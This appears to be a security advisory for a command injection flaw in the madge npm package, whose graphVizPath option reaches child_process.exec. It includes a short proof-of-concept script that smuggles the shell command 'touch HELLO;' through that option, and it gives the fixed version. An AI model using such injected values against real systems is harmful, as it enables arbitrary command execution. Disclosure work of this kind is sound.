madge - Create graphs from module dependencies.

    Command Injection

    madge is a developer tool for generating a visual graph of your module dependencies, finding circular dependencies, and giving you other useful information.

    Affected versions of this package are vulnerable to Command Injection. A custom Graphviz path can be supplied through the graphVizPath option; when the .image(), .svg() or .dot() functions are called, that value is passed to child_process.exec and is therefore interpreted by the shell.


    1. Install the `madge` module: `npm i madge`
    2. Run the following poc.js:
    // Example taken from:
    const madge = require('madge');
    madge('..', {graphVizPath: "touch HELLO;"})
    .then((res) => res.svg())
    .then((writtenImagePath) => {
    console.log('Image written to ' + writtenImagePath);
    });

    How to fix Command Injection?

    Upgrade madge to version 4.0.1 or higher.
